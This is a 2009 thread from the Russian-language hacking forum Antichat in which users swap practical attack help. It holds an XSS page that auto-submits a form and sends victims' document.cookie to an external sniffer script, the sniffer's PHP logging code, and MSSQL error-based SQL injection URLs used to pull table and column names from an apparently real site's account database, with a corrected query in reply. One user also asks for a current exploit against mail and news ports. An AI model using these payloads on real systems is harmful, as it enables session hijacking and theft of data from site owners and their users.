ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.11.2009, 17:10
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 l1ght:
Если нетрудно, приведи пример хоть одной PostgreSQl инъекции, где вообще возможно посчитать кол-во таблиц в information_schema.tables и увидеть результат в сорцах страницы
отправил в личку
Последний раз редактировалось Pashkela; 16.11.2009 в 17:17..
|
|
|
16.11.2009, 17:19
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Pashkela
count(*) отлично работает везде, уверен, что ты забываешь о приведении типов, из-за этого и проблемы
PS. Я бы дал линк, но ты-же начнёшь там свою чудопрогу тестить, и будет на нормальном сайте жопа в логах 
|
|
|
|
16.11.2009, 17:22
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 jokester:
и будет на нормальном сайте жопа в логах
POST|GET|PROXY и жопа и в логах? Лучше не отмазывайся а дай ответ на вопрос. Ссылку (свою) скинул в личку |
|
|
|
16.11.2009, 17:29
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Pashkela
2 jokester:
POST|GET|PROXY и жопа и в логах? Лучше не отмазывайся а дай ответ на вопрос. Ссылку (свою) скинул в личку Отписал ответ в ПМ, по поводу проги тоже
По поводу отмазываться, спасибо, оценил
|
|
|
|
16.11.2009, 18:22
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
2 jokester:
спасибо, помогло  |
|
|
|
16.11.2009, 21:03
|
|
Постоянный
Регистрация: 13.11.2009
Сообщений: 437
Провел на форуме:
709575
Репутация:
17
|
|
каким актульным сплоитом можно атаковать 143 или 25 или 119
заранее спасибо
|
|
|
|
16.11.2009, 23:55
|
|
Познающий
Регистрация: 25.03.2008
Сообщений: 65
Провел на форуме:
190034
Репутация:
3
|
|
Сообщение от G4bR1eL
Нужна небольшая консультация по XSS. XSS (пассивку) нашел , но немогу настроить frame.htm для сайта со сниффером.
Код:
<html>
<body>
<form name="xss" action="http://***.com.ua//index.jsp" method="post">
<input type="hidden" name="com" value="***">
<input type="hidden" name="***" value='1000">
<script>document.location.href="http://****.phpnet.us/s.php?"+document.cookie;</script>'>
<script language=javascript>xss.submit()</script>
</form>
</body>
</html>
Что верно будет прописывать в сием файле и почему? Звездочки поставил для конспирации. Уточняю проблему, у клиентской части скрипт проводит успешно xss инъекцию через POST, и выводит в стиле ***.com/s.php?SESSIONID=0BA480B72D67E063B2FD65FDC66D;%20au thlogin=Lol;%20auth=e827b3871c8906ff8973b257bb2e9.
Все что после знака ? есть QUERY_STRING, а в сниффаке четко прописано
Код:
if ($file)
{ $f = fopen($filename, 'a');
flock($f,2);
fputs($f, $QUERY_STRING."\r\n\r\n\r\n");
fflush ($f);
flock($f,3);
fclose($f); }
Почему данные не уплывают на сниффер?
P.s. С куниковским сниффаком та же фигня. Я не представляю в чем проблема.
Последний раз редактировалось G4bR1eL; 17.11.2009 в 00:54..
|
|
|
|
17.11.2009, 01:57
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
Нужна помощь с ответами по этим вопросам: http://forum.antichat.ru/thread155501.html
|
|
|
|
17.11.2009, 04:41
|
|
Banned
Регистрация: 12.10.2009
Сообщений: 26
Провел на форуме:
60097
Репутация:
26
|
|
//база MSSQL
итак, вернёмся к моим баранам
из нужной базы которая называется accountinfo, вот этим запросом, я вытянул названи нужной мне таблицы
http://***************.com/********.asp?id=637&Type=0++and+1=convert(int,(sel ect+top+1+table_name+from+accountinfo.information_ schema.tables+where+table_name+NOT+IN+(select+top+0+table_name+from+accountinfo.information_schema.ta bles)+))--
она под номером 0 под названием sales_rpt
затем из этой таблицы я получил нужную мне колонку
http://***************.com/********.asp?id=637&Type=0++and+1=convert(int,(sel ect+top+1+column_name+from+accountinfo.information _schema.columns+where+column_name+NOT+IN+(select+t op+0+column_name+from+accountinfo.information_schema.c olumns)+))--
она тоже под номером 0 и называется accumulated_rp
так вот, в этой же базе под номером 7 таблица AccountInfo
из которой мне нужно вывести колонки, но у меня не получается вывести колонки. как правильно заепашить запрос?
пробовал так
http://***************.com/********.asp?id=637&Type=0++and+1=convert(int,(sel ect+AccountInfo+column_name+from+accountinfo.information_schema.c olumns+where+column_name+NOT+IN+(select+top+1+colu mn_name+from+accountinfo.information_schema.column s)+))--
но не выводит
Последний раз редактировалось [i]; 17.11.2009 в 04:43..
|
|
|
|
17.11.2009, 06:04
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
select column_name from accountinfo.information_schema.columns where table_name='AccountInfo'
не?(
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [i]](/avatars/avatar100185.jpg?1694452){kind=avatar}
Линейный вид
